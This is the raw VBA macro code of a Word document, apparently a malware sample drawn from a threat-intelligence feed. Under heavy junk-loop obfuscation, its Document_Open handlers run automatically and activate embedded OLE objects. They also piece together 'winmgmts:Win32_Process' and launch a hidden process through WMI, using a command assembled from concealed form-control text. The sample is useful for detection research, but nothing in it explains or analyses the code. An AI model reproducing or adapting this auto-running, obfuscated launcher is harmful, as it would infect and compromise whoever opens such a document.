Attribute VB_Name = "Lufftvhumwv"
Attribute VB_Base = "0{6572560A-D99D-4DBA-827A-31137839E1BA}{62B3A02E-738E-411B-9FBA-3D9575EC5E10}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Qaahvaclpq"
Function Yvsiothutiq()
   For Smxczpyddrswr = Rhuzjrlk To 0
      For Zqhyrgrhnqqsa = Slrakyoomrbci To 0
         Hcifayqel = (23 + Round(WOJOkxR3))
      Next
      Pdwkygwb = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Tkeykcvgq = uzH To MZDUoaj1
         Yhjojvxzb = ChrB(dANsZ68a4)
         Next
      For Oiikrbtug = 0 To 0
         Znsehqvvxvht = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Fdsjomlffkyik = Szdakctcvnyno.Mynywmpnsnimt
   For Vywxrsfzjx = Bleuoofvj To 0
      For Cufdlapsvg = Bnzbgbquqipjw To 0
         Wcqiyaqtcmp = (23 + Round(WOJOkxR3))
      Next
      Tecbxocgpnytt = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Tevgaktqeyfw = uzH To MZDUoaj1
         Worhqblgolhi = ChrB(dANsZ68a4)
         Next
      For Osofzyayq = 0 To 0
         Oaoxcrsrmtyh = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Bgtdbgioisuu = Fdsjomlffkyik + Lufftvhumwv.Wawwapekzf + Lufftvhumwv.Cfigwcer + Lufftvhumwv.Ugptwqxgnryt
   For Ndsqmezbiiep = Iqbkmsai To 0
      For Hyonlyhko = Bfvoczumyk To 0
         Hgwjmgjs = (23 + Round(WOJOkxR3))
      Next
      Mioplpkatbgr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Gvktfvovew = uzH To MZDUoaj1
         Poveezgks = ChrB(dANsZ68a4)
         Next
      For Mnecxrbv = 0 To 0
         Ldqwpnkdrerie = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Sioilupzh = Bgtdbgioisuu + Lufftvhumwv.Sswssxmctzf + Lufftvhumwv.Hznflgdnwvvcn.ControlTipText
   For Jcijfadun = Onhwpvvwpodx To 0
      For Mqfmlbedr = Twdsmudfu To 0
         Oqjfepxqgf = (23 + Round(WOJOkxR3))
      Next
      Sjyhbfnkv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Wzrdctzroac = uzH To MZDUoaj1
         Cgwpfahcusk = ChrB(dANsZ68a4)
         Next
      For Mbzgtotcngm = 0 To 0
         Xgnkdqgkevjx = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Yvsiothutiq = Eseejeowafo + Sioilupzh + Eseejeowafo
   For Grrefsjqouct = Gsatrpueehua To 0
      For Vipetfmbwmfgi = Ysiemtllkv To 0
         Cnjjfhnvgexan = (23 + Round(WOJOkxR3))
      Next
      Vnolgkugp = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Ydjweiqhknnca = uzH To MZDUoaj1
         Pdtuirgnqywjw = ChrB(dANsZ68a4)
         Next
      For Gtxijjlkz = 0 To 0
         Fvriknmkvq = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
End Function
Function Lumrsndtfe()
   For Ksinanztcjoj = Fcsnjjhyvugzg To 0
      For Qzxtmjubkbt = Kkxglsgfjbyr To 0
         Wnhagudmjq = (23 + Round(WOJOkxR3))
      Next
      Pkahlpgqnkxzn = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Kgyzcaxxncbni = uzH To MZDUoaj1
         Ahqlcwfbpikvy = ChrB(dANsZ68a4)
         Next
      For Hmsvtflqmys = 0 To 0
         Ekcycpkpjb = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Nvkvcjqwovjv = "wi" + "nmgmt" + "s:" + "Win3" + "2_" + Szdakctcvnyno.Mynywmpnsnimt + "r" + "oc" + "ess" + I
   For Xblmgbtvfy = Znohfstnsuqa To 0
      For Hvvmmkvuoe = Cuchivhz To 0
         Vmjojyqck = (23 + Round(WOJOkxR3))
      Next
      Xuyasmqxf = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Gdqzllmvte = uzH To MZDUoaj1
         Zjdyawel = ChrB(dANsZ68a4)
         Next
      For Tfzdhpjqcgf = 0 To 0
         Gxjneqprd = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Set Ajwwwile = CreateObject(Nvkvcjqwovjv)
   For Bzjpaoucijckd = Wdjrbmxon To 0
      For Mpysyrncsnid = Jlnfypkj To 0
         Wepbmdlvogbf = (23 + Round(WOJOkxR3))
      Next
      Klxafsnzfns = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Ipkjdagwub = uzH To MZDUoaj1
         Obnpxcdiyvn = ChrB(dANsZ68a4)
         Next
      For Dvewzcjmtd = 0 To 0
         Xxfwtpjlk = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Jztsqupmp = Nvkvcjqwovjv + Lufftvhumwv.Efklqojnifz.ControlTipText + Lufftvhumwv.Jjhrjcbgphg.ControlTipText
   For Uwrpmjmije = Igbxkavh To 0
      For Cykkrcha = Xwdniynpawz To 0
         Lzvvdwxwcvtu = (23 + Round(WOJOkxR3))
      Next
      Bskaimzdm = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Plnghtayeyl = uzH To MZDUoaj1
         Deutvbktp = ChrB(dANsZ68a4)
         Next
      For Wqvrqvimsh = 0 To 0
         Kpucswogqv = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Uqwcloqmp = Jztsqupmp + Szdakctcvnyno.Mynywmpnsnimt
   For Ccwwujju = Jhsdomsq To 0
      For Pkayzgmclav = Fggglqroeley To 0
         Twhxffwls = (23 + Round(WOJOkxR3))
      Next
      Woxgiuhwomwif = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Hakywzdasgddp = uzH To MZDUoaj1
         Tofiocuivrwci = ChrB(dANsZ68a4)
         Next
      For Obpgxwbuexsne = 0 To 0
         Qrorsicxt = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Set Lumrsndtfe = CreateObject(Uqwcloqmp)
   For Kabajryzmtoik = Cbafkhdtujfd To 0
      For Pjkgxzdd = Gsbndqwltfefa To 0
         Phhgqeozxwk = (23 + Round(WOJOkxR3))
      Next
      Nrpyudyr = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Pdmujuxkibs = uzH To MZDUoaj1
         Wwqtstdqsmux = ChrB(dANsZ68a4)
         Next
      For Gkxkwkrrddj = 0 To 0
         Amccjgysb = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Lumrsndtfe.XSize = False
   For Ggiwnnnojwmde = Uwtuyqvoeasd To 0
      For Dejjjzwxqgkzi = Xevrvrxxdz To 0
         Revujmqgsc = (23 + Round(WOJOkxR3))
      Next
      Fyxgmkzhqchw = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Fggggkcoft = uzH To MZDUoaj1
         Amsytukamx = ChrB(dANsZ68a4)
         Next
      For Kszzvpxzxyg = 0 To 0
         Lwisrtdm = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Lumrsndtfe.YSize = False
   For Roervajmxag = Evelusbbee To 0
      For Jsumzgwwgjafx = Mxoetqegq To 0
         Hrilnjgv = (23 + Round(WOJOkxR3))
      Next
      Oaytjgeuv = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Knpepaeffme = uzH To MZDUoaj1
         Yfnuwqybxwxwp = ChrB(dANsZ68a4)
         Next
      For Kalvbowdth = 0 To 0
         Bqgukqbvds = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Do While Ajwwwile.Create(Null & Yvsiothutiq, Kicgewzmydo, Lumrsndtfe)
Loop
   For Rpilyuwgsso = Coxvylvuqngjz To 0
      For Kekzkpjg = Crdglvzxkddt To 0
         Pruacbbyhuw = (23 + Round(WOJOkxR3))
      Next
      Okishqbvu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Erhmpjyrgvk = uzH To MZDUoaj1
         Idfsejjkynkm = ChrB(dANsZ68a4)
         Next
      For Vcxtuahwku = 0 To 0
         Yvehmernke = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
End Function
Attribute VB_Name = "Szdakctcvnyno"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Mynywmpnsnimt, 0, 0, MSForms, TextBox"
Private Sub Document_Open()
        Dim varObj As Variant
        For Each varObj In ActiveDocument.InlineShapes
        If varObj.Type = wdInlineShapeEmbeddedOLEObject Then
        varObj.OLEFormat.Activate
        End If
        Next varObj
        Dim c As String
        For Each varObj In ActiveDocument.Shapes
        If varObj.Type = msoEmbeddedOLEObject Then
        varObj.OLEFormat.Activate
        End If
        Next varObj
        End Sub
Private Sub Document_Open()
   For Fmhznsroxw = Dqwjnxny To 0
      For Izfigpaqchor = Bjdsalncavr To 0
         Bfwtcvnditel = (23 + Round(WOJOkxR3))
      Next
      Gtrnmqgietu = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Efykrfxy = uzH To MZDUoaj1
         Olwnltpyg = ChrB(dANsZ68a4)
         Next
      For Gjihflktbdyfs = 0 To 0
         Jingepvocbpcv = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Axxitldkgae = Zqvyjigbukqsg To 0
      For Cwnhazfzqtqms = Zrujbzanhsb To 0
         Mhqnrhijm = (23 + Round(WOJOkxR3))
      Next
      Xuqefswoadlyy = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Wbjgoymzmicc = uzH To MZDUoaj1
         Shmuvlhivh = ChrB(dANsZ68a4)
         Next
      For Nmcbjsrzkgagi = 0 To 0
         Uewcqbeiwy = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
   For Nfhqllkwrntb = Lpfldxzabmh To 0
      For Xthyfkalxobvh = Oprgxewak To 0
         Ptnduimomdkpn = (23 + Round(WOJOkxR3))
      Next
      Foaepwmrlmvb = (1 - CDate(33 * CStr(4) * knwp8625Y - Atn(NkUOr1KWV * 1)))
      For Asxyiuhyttsj = uzH To MZDUoaj1
         Fdzdodziafjbc = ChrB(dANsZ68a4)
         Next
      For Rzhjvmkn = 0 To 0
         Wmgugmgco = 43 * CInt(45 - CSng(jUnR69) - 11)
      Next
Next
Lumrsndtfe
End Sub


INQUEST-PP=macro
